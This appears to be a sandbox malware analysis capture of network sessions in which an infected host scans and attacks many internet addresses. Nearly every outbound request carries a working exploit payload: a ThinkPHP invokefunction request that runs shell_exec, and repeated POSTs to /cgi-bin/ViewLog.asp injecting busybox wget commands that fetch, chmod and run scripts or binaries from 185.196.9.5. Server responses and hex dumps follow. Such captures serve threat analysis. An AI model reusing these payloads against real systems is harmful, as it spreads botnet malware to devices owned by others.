Feb 25, 2024 19:04:31.513108015 CET	311	IN	HTTP/1.0 404 Not Found Date: Sun, 25 Feb 2024 21:58:47 GMT Server: Boa/0.94.13 Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /index.php was not found on this server.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
839	192.168.2.15	53188	88.221.250.52	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:31.421364069 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:31.755088091 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:31 GMT Date: Sun, 25 Feb 2024 18:04:31 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 63 30 39 30 65 63 34 26 23 34 36 3b 31 37 30 38 38 38 34 32 37 31 26 23 34 36 3b 31 34 31 61 36 62 65 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2c090ec4.1708884271.141a6bea</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
840	192.168.2.15	37764	94.122.92.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.430267096 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:37.605319023 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
841	192.168.2.15	35192	94.123.154.39	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.430305958 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
842	192.168.2.15	52510	94.120.166.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.430370092 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
843	192.168.2.15	48624	31.200.46.197	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.430588961 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
844	192.168.2.15	58278	85.10.88.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.438632011 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:33.685923100 CET	410	IN	HTTP/1.1 302 Redirect Date: Sun Feb 25 18:04:33 2024 Content-Length: 221 Connection: keep-alive Location: http://185.196.9.5/auth/login.html X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 74 6f 20 61 20 6e 65 77 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 61 75 74 68 2f 6c 6f 67 69 6e 2e 68 74 6d 6c 22 3e 6c 6f 63 61 74 69 6f 6e 3c 2f 61 3e 2e 0d 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 75 70 64 61 74 65 20 79 6f 75 72 20 64 6f 63 75 6d 65 6e 74 73 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 6e 65 77 20 6c 6f 63 61 74 69 6f 6e 2e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: <html><head></head><body> This document has moved to a new <a href="http://185.196.9.5/auth/login.html">location</a>. Please update your documents to reflect the new location. </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
845	192.168.2.15	42658	85.156.203.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.463145971 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
846	192.168.2.15	58496	95.183.72.180	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.477051973 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:33.768965006 CET	349	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=utf-8 Content-Length: 130 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
847	192.168.2.15	59368	31.120.217.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.848124027 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:34.031765938 CET	224	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
848	192.168.2.15	53238	31.136.86.20	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.852616072 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:34.437314034 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:35.589282990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:37.861310959 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.469233990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:51.685105085 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:11.140872955 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.004728079 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
849	192.168.2.15	45932	94.253.225.176	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.883678913 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:34.105235100 CET	191	IN	HTTP/1.1 301 Moved Permanently Location: https://185.196.9.5/cgi-bin/ViewLog.asp Content-Length: 0 Connection: close Date: Sun, 25 Feb 2024 18:04:33 GMT Server: WebServer

Session ID	Source IP	Source Port	Destination IP	Destination Port
850	192.168.2.15	51676	94.122.194.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.886409998 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
851	192.168.2.15	43332	94.121.105.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.886533976 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
852	192.168.2.15	60480	94.121.108.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.887746096 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
853	192.168.2.15	35996	31.200.67.38	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.887933969 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
854	192.168.2.15	37216	94.123.33.72	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.891817093 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
855	192.168.2.15	55812	85.93.52.250	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:33.925092936 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:34.163355112 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:34 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
856	192.168.2.15	50478	62.215.131.82	8080

Timestamp	Bytes transferred	Direction	Data
